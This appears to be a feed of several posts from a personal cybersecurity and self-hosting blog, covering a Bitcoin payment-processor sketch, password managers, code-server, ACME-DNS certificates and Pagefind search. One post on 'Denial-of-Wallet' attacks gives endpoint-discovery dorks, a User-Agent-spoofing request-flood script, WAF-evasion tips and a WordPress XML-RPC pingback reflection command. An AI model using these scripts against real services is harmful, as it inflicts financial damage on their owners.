    Creating a custom lightweight solution isn’t as daunting as it sounds. While the previously mentioned platforms offer comprehensive features, you might find yourself needing only a fraction of them. Allow me to introduce you to one of my “Karl Projects” that I never quite finished. One day, while procrastinating on my actual project, I stumbled upon the idea of a super-secret Telegram chat where people would have to pay fees in Bitcoin or Monero. This brainchild was inspired by contemplating the possibilities of utilizing a State Machine.

    Here’s the gist of what you’ll need:

    • State Management: Maintain states such as ORDER_NEWORDER_PROCESSINGORDER_PAID.
    • Dynamic Address Generation: Generate a new address for each transaction (because, let’s face it, that’s what the cool kids do).
    • Transaction Verification: Verify if transactions are confirmed.
    • Payment Request Generation: Create a mechanism for generating payment requests.

    Now, let’s take a peek at my unfinished test code. May it ignite your creativity and spur you on to achieve remarkable feats:

    Python
    import json
    from typing import List
    from bitcoinlib.wallets import Wallet, wallet_create_or_open, WalletKey, BKeyError
    
    # Creating or opening a wallet
    w = wallet_create_or_open(
        "karls_wallet",
        keys="",
        owner="",
        network=None,
        account_id=0,
        purpose=None,
        scheme="bip32",
        sort_keys=True,
        password="",
        witness_type=None,
        encoding=None,
        multisig=None,
        sigs_required=None,
        cosigner_id=None,
        key_path=None,
        db_uri=None,
        db_cache_uri=None,
        db_password=None,
    )
    
    def get_personal_address(wallet: Wallet, name: str = "") -> WalletKey | List[WalletKey]:
        if not name:
            return wallet.keys()
    
        return wallet.key(name)
    
    def create_new_address(wallet: Wallet, name: str = "") -> WalletKey:
        if not name:
            return wallet.get_key()
    
        return wallet.new_key(name)
    
    def check_for_transaction(wallet_key: str | WalletKey, wallet: Wallet):
        if isinstance(wallet_key, str):
            try:
                wallet_key = wallet.key(wallet_key)
            except BKeyError as e:
                print(f'Sorry, no key by the name of "{wallet_key}" in the wallet.')
                return
    
        wallet.scan_key(wallet_key)
        recent_transaction = w.transaction_last(wallet_key.address)
    
        if recent_transaction:
            print("Most Recent Transaction:")
            print("Transaction ID:", recent_transaction.txid)
            print("Amount:", recent_transaction.balance_change)
            print("Confirmations:", recent_transaction.confirmations)
        else:
            print("No transactions found for the address.")
    

    Feel free to adapt and expand upon this code to suit your needs. Crafting your payment processor from scratch gives you unparalleled control and customization options, empowering you to tailor it precisely to your requirements. Maybe one day I will put a finished minimalistic payment processor out there.

    Summary

    And with that disappointing note, we conclude for now. But fear not, for knowledge awaits. Here are some additional sources to delve deeper into the world of cybersecurity and anonymity:

    Keep exploring, stay curious, and until next time!

    In case you are from Interpol

    You might be thinking, “Whoa, talking about setting up shop on the dark web sounds sketchy. Should we knock on this guys door?” Hey, I get it! But fear not, my friend. Writing about this stuff doesn’t mean I am up to no good. I am just exploring the possibilities, like any curious entrepreneur would. Plus, remember the “Shiny Flakes” story? Bad actors can do bad stuff anywhere, not just on the dark web.

  • Vaultwarden: A Lightweight, Self-Hosted Password Manager

    Vaultwarden: A Lightweight, Self-Hosted Password Manager

    What is Vaultwarden ?

    According to their GitHub page:

    An alternative server implementation of the Bitwarden Client API, written in Rust and compatible with official Bitwarden clients [disclaimer], perfect for self-hosted deployment where running the official resource-heavy service might not be ideal.

    If you’re unfamiliar with Vaultwarden or Bitwarden, here’s a quick primer: Vaultwarden is a self-hosted password manager that allows you to securely access your credentials via web browsers, mobile apps, or desktop clients. Unlike traditional cloud-based solutions, Vaultwarden is designed for those of us who value control over our data and want a “syncable” password manager without the resource-heavy overhead.

    Since anything that isn’t self-hosted or self-administered is out of the question for me, Vaultwarden naturally caught my attention. Its lightweight design is perfect for a minimal resource setup. Here’s what I allocated to my Vaultwarden instance:

    Alpine LXC

    1 CPU Core

    1 GB RAM

    5 GB SSD Storage

    And let me tell you, this thing is bored. The occasional uptick in memory usage you might notice is mostly me testing backups or opening 20 simultaneous sessions across devices—so not even Vaultwarden’s fault. To put it simply: you could probably run this on a smart toaster, and it would still perform flawlessly.

    Why I Tried Vaultwarden

    Initially, I came across Vaultwarden while exploring the Proxmox VE Helper Scripts website and thought, “Why not give it a shot?” The setup was quick, and I was immediately impressed by its sleek, modern UI. Since Vaultwarden is compatible with Bitwarden clients, you get the added bonus of using the polished Bitwarden desktop app and its functional, albeit less visually appealing, browser extension.

    My main motivation for trying Vaultwarden was to move away from syncing my KeePass database across Nextcloud and iCloud. This process had become tedious, especially when setting up new development environments or trying out new Linux distributions—something I do frequently.

    Each time, I had to manually copy over my KeePass database, which meant logging into Nextcloud to retrieve it—a task that was ironically dependent on a password stored inside KeePass, which I didn’t have access to yet. With Vaultwarden, I can simply open a browser, enter my master password, and access everything instantly.

    Yes, it’s only one or two steps less than my KeePassXC workflow, but sometimes those minor annoyances add up more than they should. Vaultwarden’s seamless syncing across devices has been a breath of fresh air.

    Is KeePassXC Bad? Not at All! Here’s Why I Still Love It

    Over the years, KeePassXC has been an indispensable tool for managing my passwords and SSH keys. Even as new solutions like Vaultwarden (a self-hosted version of Bitwarden) gain popularity, KeePassXC continues to hold its ground, excelling in several areas where others fall short. Here’s a detailed breakdown of why I still rely on KeePassXC and how it outshines alternatives like Vaultwarden and Bitwarden.

    Why KeePassXC Stands Out (in my opinion)

    1. Superior Password Generator

    KeePassXC’s default password generator is leaps and bounds ahead of the competition. Its design is both powerful and intuitive, offering extensive customization without overwhelming the user. You can effortlessly fine-tune the length, complexity, and character set of generated passwords, making it ideal for advanced use cases.

    2. SSH Agent Integration

    If you work with multiple SSH keys (I manage over 100), KeePassXC’s built-in SSH agent is a game-changer. It allows seamless integration and management of SSH keys alongside your passwords, streamlining workflows for developers and sysadmins alike. This feature alone makes KeePassXC a must-have for me.

    3. File and Hidden Text Storage

    Unlike Bitwarden, which doesn’t currently support file storage, KeePassXC offers advanced options for securely storing files and hidden text.

    Why I’m Running KeePassXC and Vaultwarden in Parallel

    While I’ve started using Vaultwarden for some tasks, there are still key features in KeePassXC that I simply can’t live without:

    Local-Only Security:

    KeePassXC keeps everything offline by default, which eliminates the risks of exposing passwords to the internet. Even though I host Vaultwarden behind a VPN for added peace of mind, there’s something inherently reassuring about KeePassXC’s local-first approach.

    Privacy vs. Accessibility:

    Vaultwarden offers enough security features like MFA, WebAuthn or hardwaretoken to safely expose it online, but the idea of having my passwords accessible over the internet still feels unsettling. For that reason, KeePassXC remains my go-to for my most sensitive credentials. I am probably just paranoid, hosting it behind Cloudflare and a firewall with a Client certificate would add sufficient security (on top) where you would not have to worry.

    Unique Features:

    There are small yet critical features in KeePassXC, like its file storage capabilities and SSH agent integration, that Vaultwarden simply lacks at the moment.

    What Vaultwarden Does Well

    To give credit where it’s due, Vaultwarden brings some compelling features to the table. One standout is the reporting feature, which alerts you to compromised passwords. It’s a fantastic tool for staying on top of security best practices, I am also a huge fan of web based tools and I like the UI and UX in general.

    Conclusion

    Both KeePassXC and Vaultwarden have their strengths, and which one you choose ultimately depends on your priorities. For me, KeePassXC remains the gold standard for password management, offering unparalleled functionality for advanced users. Vaultwarden complements it well for “cloud”-based access and reporting, but it still has a long way to go before it can replace KeePassXC in my workflow.

    For now, running both in parallel strikes the perfect balance between security, usability, and convenience. Since I am running Vaultwarden on my Proxmox, which is already handling all my backup tasks, I also do not have to worry about data loss or doing extra work.

  • Unlock the Power of Remote Development with code-server

    Unlock the Power of Remote Development with code-server

    In the fast-paced world of software development, flexibility and efficiency are paramount. Enter code-server, an innovative tool that allows you to run Visual Studio Code (VS Code) in your browser, bringing a seamless and consistent development environment to any device, anywhere.

    Whether you’re working on a powerful desktop, a modest laptop, or even a tablet (pls don’t!), code-server ensures you have access to your development environment at all times. Here’s an in-depth look at what makes code-server a game-changer.

    What is code-server ?

    code-server is an open-source project that enables you to run VS Code on a remote server and access it via your web browser. This means you can:

    • Work on any device with an internet connection.

    • Leverage the power of cloud servers to handle resource-intensive tasks.

    • Maintain a consistent development environment across devices.

    With over 69.2k stars on GitHub, code-server has gained significant traction among developers, teams, and organizations looking for efficient remote development solutions.

    Why would you use code-server ?

    1. Flexibility Across Devices

    Imagine coding on your laptop, switching to a tablet, or even a Chromebook, without missing a beat. With code-server, your development environment follows you wherever you go—seamlessly.

    2. Offloading Performance to the Server

    Running resource-intensive tasks on a server instead of your local machine? Yes, please! Whether you’re working on complex builds or handling large datasets, code-server takes the heavy lifting off your device and onto the server.

    3. Bringing Your Dev Environment Closer to LLMs

    With the rise of large language models (LLMs), working near powerful servers hosting these models has become a necessity. No more downloading terabytes of data just to test integrations locally. Code-server simplifies this by placing your environment right where the action is.

    4. Because I Can! 🥳

    As a coder and IT enthusiast, sometimes the best reason is simply: Because I can! Sure, you could run local VSCode with “Remote Development” extensions or install it directly on a Chromebook—but where’s the fun in that? 😉

    5. Streamlined Backup and File Management

    One of my favorite aspects? Developing directly on a remote system where my regular backup processes already take care of everything. No extra steps, no worries—just peace of mind knowing my work is secure.

    I just did it to do it, I use code-server to manage all my Proxmox scrips and develop little Sysadmin tools. You also get a nice web shell.

    Installation

    Requirements

    Before diving in, make sure your system meets the minimum requirements:

    Linux machine with WebSockets enabled. (this is important to know when you use a reverse proxy)

    • At least 1 GB RAM and 2 vCPUs.

    I think you can get away with 1 CPU, mine is bored most of the time, obviously running resource intensive code will eat more.

    Check out the full requirements here.

    Installation

    There are multiple ways to get started with code-server, but I choose the easiest one:

    Bash
    curl -fsSL https://code-server.dev/install.sh | sh

    This script ensures code-server is installed correctly and even provides instructions for starting it. Never run script like this from the internet before checking it.

    Configuration

    After installation, you can customize code-server for your needs. Explore the setup and configuration guide to tweak settings, enable authentication, and enhance your workflow.

    Bash
    nano ~/.config/code-server/config.yaml

    That is where you will find the password to access code-server and you can also change the port:

    ~/.config/code-server/config.yml
    bind-addr: 127.0.0.1:8080
    password: 5f89a538c9c849b439d0f866
    cert: false

    You can disable auth by commenting out password. Personally I use SSO through Authentik for authentication.

    Now you have an awesome way to code in your browser:

    Resources

    GitHub Repository

    Setup Guide

    Frequently Asked Questions

  • How to Get Real Trusted SSL Certificates with ACME-DNS in Nginx Proxy Manager

    How to Get Real Trusted SSL Certificates with ACME-DNS in Nginx Proxy Manager

    Today, I’m going to show you how you can obtain real, trusted SSL certificates for your home network or even a public website. Using this method, you can achieve secure HTTPS for your web services with certificates that browsers recognize as valid. Fun fact: the very website you’re reading this on uses this same method!

    This guide focuses on using ACME-DNS with Nginx Proxy Manager (NPM), a popular reverse proxy solution with a user-friendly web interface. Whether you’re setting up a self-hosted website, Nextcloud, or any other service, this approach can provide you with certificates signed by a trusted Certificate Authority (CA) for your home network or the public.

    Prerequisites

    • I am assuming you are on a Debian based Linux distribution (I will use a Debian 12 LXC). This should work an any host supporting Docker though.
    • You should have some knowledge of Docker and Docker Compose and it should be installed. You can find a step by step guide here.
    • You need your own domain. I get mine from Namecheap but any provider works. (I usually change the Nameserver to Cloudflare and manage them there since Namecheap is cheaper to buy)

    Please make sure you have these packages installed:

    Bash
    apt install curl jq nano

    (Jup, I like nano. Feel free to use your editor of choice.)

    Installing Nginx Proxy Manager

    Please refer to the installation guide on the Nginx Proxy Manager Website.

    For our installation we will be using Docker with Docker Compose:

    docker-compose.yml
    services:
      npm:
        image: 'jc21/nginx-proxy-manager:latest'
        restart: unless-stopped
        ports:
          - '443:443'
          - '81:81' # Admin Port
          # - '80:80' # not needed in this setup
        volumes:
          - ./data:/data
          - ./letsencrypt:/etc/letsencrypt
          # - ./custom-syslog.conf:/etc/nginx/conf.d/include/custom-syslog.conf

    I only like to expose port 443, since we will be using ACME-DNS we will not need 80. Port 81 will be exposed for now, but once configured we will remove this too.

    Now just run this command and you will be able to log in via http://your-ip:81 (replace “your-ip” with the actual IP of your machine, you can try http://127.0.0.1:81 if run locally)

    Bash
    docker compose up -d

    The default credentials are:

    Bash
    Email:    [email protected]
    Password: changeme

    Optional:

    I will show you my custom syslog config, but this is beyond the scope of this post, this is optional you do not need this:

    custom-syslog.conf
    log_format proxy_host_logs '$remote_addr - $remote_user [$time_local] '
                               '"$request" $status $body_bytes_sent '
                               '"$http_referer" "$http_user_agent" "$host" '
                               'tag="proxy-host-$host"';
    
    access_log syslog:server=udp://logs.karl:514,tag=proxy-host-$host proxy_host_logs;
    error_log syslog:server=udp://logs.karl:514,tag=proxy-host-$host warn;

    logs.karl is my local DNS record for my rsyslog server. I will make a post about my logging setup and link it here in the future.

    Setting up ACME-DNS

    The official documentation can be found here.

    Simply run this command:

    Bash
    curl -s -X POST https://auth.acme-dns.io/register | jq

    The response should look like this (I used some “X” to anonymize it a little):

    JSON
    {
      "username": "XXXXc1ab-XXXX-XXXX-XXXX-ec893c5ad50e",
      "password": "CkdjW5wqnXXXXXXXXXXXXXXcGZZyznUDkGRuXHdz",
      "fulldomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11.auth.acme-dns.io",
      "subdomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11",
      "allowfrom": []
    }

    Please take note of your output and copy it to a file or note taking tool for later.

    We will need to edit this a little. If you set this up for your home network it is usually a good idea to use subdomain and a wildcard certificate, this will enable you to secure anything under that subdomain.

    There should be a “data” directory in your current one from the docker command earlier. We will create a JSON config file for Nginx Proxy Manager, you can name it whatever you want.

    Bash
    ls # check if "data" dir exists
    cd data
    nano acme__you_domain.json # use your domain name, but name does not matter

    In this file you will need to paste the config. I suggest using a subdomain like “home”.

    JSON
    {
      "home.your-domain.com": {
        "username": "XXXXc1ab-XXXX-XXXX-XXXX-ec893c5ad50e",
        "password": "CkdjW5wqnXXXXXXXXXXXXXXcGZZyznUDkGRuXHdz",
        "fulldomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11.auth.acme-dns.io",
        "subdomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11",
        "allowfrom": []
      },
      "*.home.your-domain.com": {
        "username": "XXXXc1ab-XXXX-XXXX-XXXX-ec893c5ad50e",
        "password": "CkdjW5wqnXXXXXXXXXXXXXXcGZZyznUDkGRuXHdz",
        "fulldomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11.auth.acme-dns.io",
        "subdomain": "XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11",
        "allowfrom": []
      }
    }
    

    It is important to note that with a wildcard like this you can not do something like: “plex.media.home.your-domain.com”, you can only use the specified level of subdomain, if you did want to do a “sub-sub” you would need to use “*.media.home.your-domain.com” and so on.

    A note on the “allowfrom": []“. If you have a static IP that you will always be coming from this is a good idea. Since this guide focuses on SSL for home you most likely have a dynamic IP which will work until it changes, so probably 24h or a week.

    Configuring DNS Records

    You need to edit your local DNS server and edit these in your registrar. I am using Cloudflare

    Cloudflare

    go to “your Domain -> DNS -> Records” there you will need to add a CNAME record.

    In the “Name” field put “_acme-challenge.YOUR-SUBDOMAIN” in our example that would be like you see in the image below. In the “Target” field you put the “fulldomain” from your config, like “XXXX040a-XXXX-XXXX-XXXX-XXXX f8525a11.auth.acme-dns.io“. Leave “Proxy status” on “DNS only”.

    (If you are doing a public and not home only setup you would also add a A, AAAA or CNAME record pointing to your public IP. For home setup you do not need this.)

    Local DNS

    The devices in your network need to know that your reverse proxy aka. Nginx Proxy Manager is handling “*.home.your-domain.com” you need to add this to your local DNS server so whenever someone goes to “*.home.your-domain.com” it is directed to your proxy. Now if you have a Pi-Hole, AdGuard, pfSense, OPNSense or in your Router varies, technically you could even edit the hosts file of each device.
    I am using a Unifi Dream Machine :

    In your dream machine go to: /network/default/settings/routing/dns

    there you create a new entry like so:

    Please use your configured domain and the IP of your system.

    Bringing it all together

    All we need to do now I configure our setup in the Nginx Proxy Manager. Go to your Admin interface at http://your-ip:81/nginx/certificates then click on “Add SSL-Certificate” and choose “Let’s Encrypt”

    There is a lot going on here but I will explain:

    • In “Domain Names” enter the domains you have configured
    • Enter your E-Mail Address
    • Choose “ACME-DNS” in the Provider menu
    • In the API URL enter “https://auth.acme-dns.io”
    • the registration file is the JSON file we created earlier. Add whatever you called it in there, the path “/data/” should be fine if you followed all the steps.
    • Leave propagation empty

    Finally just agree and save.

    Your new certificate will pop up once the loading screen goes away.

    It should look like this:

    By the way, I have a profile image because I used my Gravatar email address for the admin login.

    Securing the Nginx Proxy Manager Admin

    Now that we have a certificate let us use it directly on our admin interface.

    Add a new proxy host. Enter the domain of your choosing (you need to change “your-domain.com”. Since it is accessing itself in the Docker network the hostname is “npm” this is its name from the “docker-compose.yml” at the beginning.

    Under the “SSL” tab just choose your created certificate.

    You do not have to choose the options for Force SSL, HTTP/2 and Block Common Exploits for this to work.

    Okay now press Save and test!

    If it works you can now remove the port from the compose:

    Bash
    docker compose down
    nano docker-compose.yml
    docker-compose.yml
    services:
      npm:
        image: 'jc21/nginx-proxy-manager:latest'
        restart: unless-stopped
        ports:
          - '443:443'
        volumes:
          - ./data:/data
          - ./letsencrypt:/etc/letsencrypt
    Bash
    docker compose up -d --build

    Now you can access your Nginx Proxy Manager admin interface via your new domain with a trusted SSL certificate.

    Conclusion

    Using ACME-DNS with Nginx Proxy Manager is a powerful way to obtain SSL certificates for your home network or website. It simplifies the process of handling DNS challenges and automates certificate issuance for secure HTTPS. You also will no longer have to expose your local services to the internet to get new certificates.

    By following this guide, you’ve gained the tools to secure your online services with minimal hassle. Stay tuned for more tips on managing your self-hosted environment, and happy hosting!

  • Denial-of-Wallet Attacks: Exploiting Serverless

    Denial-of-Wallet Attacks: Exploiting Serverless

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Introduction

    In the fast-paced world of cyber warfare, attackers are always on the hunt for new ways to hit where it hurts – both in the virtual world and the wallet. The latest trend? Denial-of-Wallet (DoW) attacks, a crafty scheme aimed at draining the bank accounts of unsuspecting victims.

    I am assuming you know what serverless is. Otherwise read this first: What is serverless computing?

    Attack Surface

    Serverless setups, touted for their flexibility and scalability, have become prime targets for these digital bandits. But fear not! Here’s your crash course in safeguarding your virtual vaults from these costly exploits.

    What’s a DoW attack, anyway?

    Think of it as the mischievous cousin of the traditional denial-of-service (DoS) onslaught. While DoS attacks aim to knock services offline, DoW attacks have a more sinister agenda: draining your bank account faster than you can say “cloud computing.”

    Unlike their DDoS counterparts, DoW attacks zero in on serverless systems, where users pay for resources consumed by their applications. This means that a flood of malicious traffic could leave you with a bill so hefty, it’d make Scrooge McDuck blush.

    But wait, there’s more!

    With serverless computing, you’re not just outsourcing servers – you’re also outsourcing security concerns. If your cloud provider drops the ball on protection, you could be facing a whole buffet of cyber threats, not just DoW attacks.

    Detecting & Protecting

    Now, spotting a DoW attack isn’t as easy as checking your bank statement. Sure, a sudden spike in charges might raise eyebrows, but by then, the damage is done. Instead, take proactive measures like setting up billing alerts and imposing limits on resource usage. It’s like putting a lock on your wallet before heading into a crowded marketplace.

    And let’s not forget about securing those precious credentials. If an attacker gains access to your cloud kingdom, they could wreak havoc beyond just draining your funds – we’re talking file deletions, instance terminations, the whole nine yards. So buckle up with least privilege services, multi-factor authentication, and service control policies to fortify your defenses.

    In the arms race between cyber crooks and cloud defenders, staying one step ahead is key. So, arm yourself with knowledge, fortify your defenses, and may your cloud budgets remain forever full!

    How to Attack

    This is what you came here for, isn’t it ? Before I go on I would like to remind you of my Disclaimer.

    Cloudflare

    First of all, big shoutout to Cloudflare for actually providing a valuable free tier of services (they do not pay me or anything, I actually like them a lot).

    Basically, they provide serverless functions called “Cloudflare Workers”, their endpoints usually look like this: worker-blah-blah-1337.blah.workers.dev You can also choose your own custom domain, but the default route is still enabled. I recommend you disable it, or else…well stay tuned.

    Here is their own billing example (Source):

    Monthly CostsFormula
    Subscription$5.00
    Requests$27.00 (100,000,000 requests – 10,000,000 included requests) / 1,000,000 _ $0.30
    CPU time$13.40 (7 ms of CPU time per request _ 100,000,000 requests – 30,000,000 included CPU ms) / 1,000,000 * $0.02
    Total$45.40

    They actually mention denial-of-wallet attacks and how you can counter them, or at least lessen the impact.

    Finding Cloudflare Workers

    One of the easiest ways to find endpoints is GitHub using a simple query like this: ?q=workers.dev&type=code or using ?q=workers.dev&type=commits. As I am writign this I found 121.000 lines of code that include workers.dev, let us maybe subtract some duplicates and maybe you end up with 20.000, some of them actually being pretty big companies as well.

    Next easy find is using some Google hackingsite:workers.dev returning 2.230.000 results (some being duplicates).

    Attacking Cloudflare Workers (hypothetically)

    Using a tool like Plow, HTTP(S) benchmarking tool can do about 1.000.000 requeests per 10 seconds on a normal machine using 20 connections. Playing around with these you can probably get a lot more, but it depends on a lot of factores like bandwidth and internet speed etc. So in theory you could cost your target $120 per hour from your home PC/Laptop. If you got 3 of your friends involved you could cost your target almost $500 per hour. Since you are running a script 24/7 that’s costing your target $12000 day or $84000 a week. Now if your’re attacking an enterprise that may not even be that bad for them, but imagine a small company paying 12k every day. As I explained above, there is also no going back, that compute is consumed and will be charged. Depending on if they use something like KV and other services you can multiply these numbers. A pretty common pattern is to have one Worker act as an API gateway, so one request could actually trigger up to 50/100 sub-requests.

    If, by just reading this, you feel bad, then congrats 🎉, you are probably one of the good guys, girls or anything in between.

    Back to reality

    Cloudflare being Cloudflare, they obviously have pretty good protections as is, in my experience better than AWS or Azure. So simply a running tool and hoping for carnage will not get you far.

    Some additional protections Cloudflare provides are:

    Being able to do all this easily for free, including their free DDoS protection should build up a nice barrier against such attacks. Looking at the bigger pricture, it is actually crazy that this can all be done for free, on AWS you would have to pay extra for all of these features and essentially denial-of-wallet yourself (😁).

    Any protection is only good, if it is enabled and configured correctly. I am using the following WAF rule for example:

    (not http.user_agent contains "Mozilla/5.0")

    This basically blocks everything that is not advertising itself as a browser. If you know a little tiny bit about how User Agents work, you know that getting around this rule is super simple. You would just need to write a script like this:

    Python
    import requests
    
    url = 'SOME PROTECTED URL'
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
    }
    
    # run 100 million requests with a timeout of one second
    for i in range(1, 100000000):
        requests.get(url, timeout=1, headers=headers)

    Now my simple filter rule thinks it is a browser and will let it through.

    Check out my 24h WAF statistic:

    As you can see most of the bots and scripts are blocked by this stupid simple rule. I am not showing you the rest of the rules, because I am literally explaining to you how you could get around my defenses, usually not a great idea on a post tagged #blackhat.

    Real world attack

    In a real world attack you will need residential proxies or multiple IPs with high rep. You then write a more advanced tool that autoamtes a browser, otherwise you will be detetcted very quickly. Even better if you use something like undetected_chromedriverfor more success.

    Obviously you also want to add random waits, a script being run every second will light up like a christmas tree:

    Python
    from random import randint
    from time import sleep
    
    sleep(randint(0,5))

    (You could just send as many requests as you want and have your hardware or internet connection add “organic” random waits, this will ultimatley lead to getting you blocked because of too many too fast requests)

    You will need more machines with more residential IPs, as this will be a lot slower. You will slwoly drain your targets wallet this way though. I mean in the end you could have this running on something like a Raspberry Pi costing you next to nothing in electricity and just slowly attacking your target, depending on their setup each single request from your side could be 50 on theirs.

    One other cool trick, which is actually still possbile, is to hijack WordPress websites that have xmlrpc.php enabled. This is called XML-RPC Pingback Attack and is as simple as:

    Bash
    curl -D - "www.vuln-wordpress.com/xmlrpc.php" \
         -d '<methodCall>
                <methodName>pingback.ping</methodName>
                <params>
                  <param>
                    <value>
                      <string>[TARGET HOST]</string>
                    </value>
                  </param>
                  <param>
                    <value>
                      <string>www.vuln-wordpress.com/postchosen</string>
                    </value>
                  </param>
                </params>
              </methodCall>'

    Summary

    As this post is getting longer I decided to end it here. These attacks work on any cloud based “serverless” provider that bills by usage. The key idea is to use as much of a companies “billed by usage” endpoints as possible.

    In theory this can do a lot of damage, in practice you will have to do a little more than just send a billion request, as fast as possible with some script, to an endpoint. I highlighted some ways to get around protections above, but you will most likely have to come up with your own new/custom solution in order to outsmart your target.

    Why Cloudflare ?

    I picked Cloudflare as an example, because I use them for everything and really like them. (Again, I am not paid to say this, I actually like them). This attack works on any other provider as well, actually it will probably work the least on Cloudflare, because of their free DDoS protection.

    Compared to AWS WAF the firewall alone would cost as much as the usage of Cloudflare Workers, so actually getting through the AWS WAF and then using a Lambda function, maybe even one that is reading some data from S3 would be disasterous.

  • Building a static site search with Pagefind

    Building a static site search with Pagefind

    Introduction

    Hey there, web wizards and code conjurers! Today, I’m here to spill the beans on a magical tool that’ll have you searching through your static site like a pro without sacrificing your users’ data to the digital overlords. Say goodbye to the snooping eyes of Algolia and Google, and say hello to Pagefind – the hero we need in the wild world of web development!

    Pagefind

    So, what’s the deal with Pagefind? Well, it’s like having your own personal search genie, but without the need for complex setups or sacrificing your site’s performance. Here’s a quick rundown of its enchanting features straight from the Pagefind spellbook:

    • Multilingual Magic: Zero-config support for sites that speak many tongues.
    • Filtering Sorcery: A powerful filtering engine for organizing your knowledge bases.
    • Custom Sorting Spells: Tailor your search results with custom sort attributes.
    • Metadata Mysticism: Keep track of custom metadata for your pages.
    • Weighted Wand Wielding: Adjust the importance of content in your search results.
    • Section Spellcasting: Fetch results from specific – sections of your pages.
    • Domain Diving: Search across multiple domains with ease.
    • Index Anything Incantation: From PDFs to JSON files, if it’s digital, Pagefind can find it!
    • Low-Bandwidth Brilliance: All this magic with minimal bandwidth consumption – now that’s some serious wizardry!

    Summoning Pagefind

    Now, let’s talk about summoning this mystical tool onto your Astro-powered site. It’s as easy as waving your wand and chanting npx pagefind --site "dist. Poof! Your site’s now equipped with the power of search!

    With a flick of your build script wand, you’ll integrate Pagefind seamlessly into your deployment pipeline. Just like adding a secret ingredient to a potion, modify your package.json build script to include Pagefind’s magic words.

    JSON
      "scripts": {
        "dev": "astro dev",
        "start": "astro dev",
        "build": "astro build && pagefind --site dist && rm dist/pagefind/*.css && cp -r dist/pagefind public/",
        "preview": "astro preview",
        "astro": "astro"
      },
    

    If you are not using Astro.js you will have to replace distwith your build directory. I will also explain why I am making the CSS dissapear.

    Running the command should automagically build your index like so:

    Bash
    [Building search indexes]
    Total:
      Indexed 1 language
      Indexed 19 pages
      Indexed 1328 words
      Indexed 0 filters
      Indexed 0 sorts
    
    Finished in 0.043 seconds
    

    Now my site is not that big, yet but 0.043 seconds is still very fast and if you are pying for build time, also next to nothing. Pagefind being written in Rust is very efficient.

    Getting Cozy with Pagefind’s UI

    Alright, so now you’ve got this powerful search engine at your fingertips. But wait, what’s this? Pagefind’s UI is a bit… opinionated. Fear not, fellow sorcerers! With a dash of JavaScript and a sprinkle of CSS, we’ll make it dance to our tune!

    Weaving a custom UI spell involves a bit of JavaScript incantation to tweak placeholders and buttons just the way we like them. Plus, with a bit of CSS wizardry, we can transform Pagefind’s UI into something straight out of our own enchanting design dreams!

    Astro
    ---
    import "../style/pagefind.css";
    ---
    
    <div class="max-w-96 flex">
      <div id="search"></div>
    </div>
    
    <script src="/pagefind/pagefind-ui.js" is:inline></script>
    <script>
      document.addEventListener("astro:page-load", () => {
        // @ts-ignore
        new PagefindUI({
          element: "#search",
          debounceTimeoutMs: 500,
          resetStyles: true,
          showEmptyFilters: false,
          excerptLength: 15,
          showImages: false,
          addStyles: false,
          //showSubResults: true,
        });
        const searchInput = document.querySelector<HTMLInputElement>(
          ".pagefind-ui__search-input"
        );
        const clearButton = document.querySelector<HTMLDivElement>(
          ".pagefind-ui__search-clear "
        );
    
        if (searchInput) {
          searchInput.placeholder = "Site Search";
        }
    
        if (clearButton) {
          clearButton.innerText = "Clear";
        }
      });
    </script>
    
    • /pagefind/pagefind-ui.js is Pagefind specific JavaScript. In the future I plan to reverse it as there is a lot of uneccessary code in there.
    • I am using astro:page-load as an event listener since I am using view transitions.

    Embrace Your Inner Stylist

    Ah, but crafting a unique style for your search UI is where the real fun begins! With the power of TailwindCSS (or your trusty CSS wand), you can mold Pagefind’s UI to fit your site’s aesthetic like a bespoke wizard robe.

    With a little imagination and a lot of creativity, you’ll end up with a search UI that’s as unique as your magical incantations.

    CSS
    .pagefind-ui__results-area {
      @apply border border-pink-500 dark:text-white text-black p-4;
      @apply absolute z-50 dark:bg-gray-900 bg-white;
      @apply max-h-96 overflow-y-auto  mr-10;
    }
    
    .pagefind-ui__result {
      @apply border-t my-4 dark:text-white text-black;
    }
    
    .pagefind-ui__result mark {
      @apply bg-fuchsia-700 text-fuchsia-300;
    }
    
    .pagefind-ui__form {
      @apply border dark:border-white border-black;
    }
    
    .pagefind-ui__search-input {
      @apply dark:text-white text-black  bg-transparent;
    }
    
    .pagefind-ui__search-input {
      @apply placeholder:italic placeholder:text-slate-400 p-2 border-r border-black;
    }
    
    .pagefind-ui__form {
      @apply min-w-full;
    }
    
    .pagefind-ui__message {
      @apply font-semibold first-letter:text-pink-500;
    }
    
    .pagefind-ui__result-link {
      @apply font-bold underline text-blue-500;
    }
    .pagefind-ui__result-title {
      @apply mb-1;
    }
    
    .pagefind-ui__result-inner {
      @apply my-3;
    }
    
    /* load more results button */
    .pagefind-ui__button {
      @apply border border-black py-1 px-2 hover:underline mt-4;
    }
    
    .pagefind-ui__search-clear {
      @apply mr-2;
    }
    

    (@apply is TailwindCSS specific, you can use regular CSS if you please)

    And there you have it, folks – the mystical journey of integrating Pagefind into your static site, complete with a touch of your own wizardly flair!

    custom search ui

    Now go forth, weave your web spells, and may your users’ search journeys be as magical as your coding adventures! 🧙✨

    Where to go from here

    I gave you a quick look into building a simple static site search. In my opinion the JavaSript files from Pagefind should be slimmed down to work, in my case for Astro, the CSS should be applied by you and Pagefind should just leave you a simple unstyled search, I am sure they would be happy if someone helped them out by doing this.

    I was thinking about hosting my index on a Cloudflare Worker, then styling my search form however I want and just hooking up the Worker endpoint with the form, basically like a self hosted Algolia. An alternative to Pagefind could be Fuse.js, the drawback is that you would have to build your own index.

    Bonus:

    You can try out my search here: Exploit.to Search

    This post was originally posted on 17 Mar 2024 at on my Cybersecurity blog.